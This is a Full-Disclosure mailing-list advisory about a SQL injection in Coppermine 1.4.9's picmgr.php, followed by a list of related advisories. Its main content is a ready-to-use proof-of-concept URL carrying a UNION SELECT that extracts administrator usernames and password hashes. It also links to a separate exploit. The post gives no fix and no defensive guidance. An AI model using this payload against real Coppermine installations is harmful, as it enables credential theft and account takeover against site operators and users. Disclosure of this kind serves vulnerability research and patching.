[Full-disclosure] Coppermine 1.4.9 SQL injection



/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Coppermine 1.4.9
http://coppermine-gallery.net/

VULNERABILITY:
SQL Injection

NOTES:
- SQL injection can be used to obtain password hash
- You must be a registered user to access the vulnerable page, picmgr.php.
- The table prefix must be known.

POC:
<victim>/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--

ADVISORY & EXPLOIT (requires registration):
http://www.w4ck1ng.com/board/showthread.php?t=1856

/****************************************/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • [Full-disclosure] SQL injection - 4images
    ... SQL injection can be used to obtain password hash ... you must log in as a registered user ... Original advisory with exploit script: ...
    (Full-Disclosure)
  • SQL injection - 4images
    ... SQL injection can be used to obtain password hash ... you must log in as a registered user ... Original advisory with exploit script: ...
    (Bugtraq)
  • [waraxe-2005-SA#042] - Multiple vulnerabilities in Coppermine Photo Gallery 1.3.2
    ... Coppermine is an easily set-up, fast, feature-rich photo gallery script with MySQL ... Therefore sql injection can take place and it's exploitable. ... Vendor first contacted: 16. ...
    (Bugtraq)
  • [Full-disclosure] SQL injection - moodle
    ... SQL injection can be used to obtain password hash ... the moodle blog "module" must be enabled ... guest access to the blog must be enabled ...
    (Full-Disclosure)
  • SQL injection - moodle
    ... SQL injection can be used to obtain password hash ... the moodle blog "module" must be enabled ... guest access to the blog must be enabled ...
    (Bugtraq)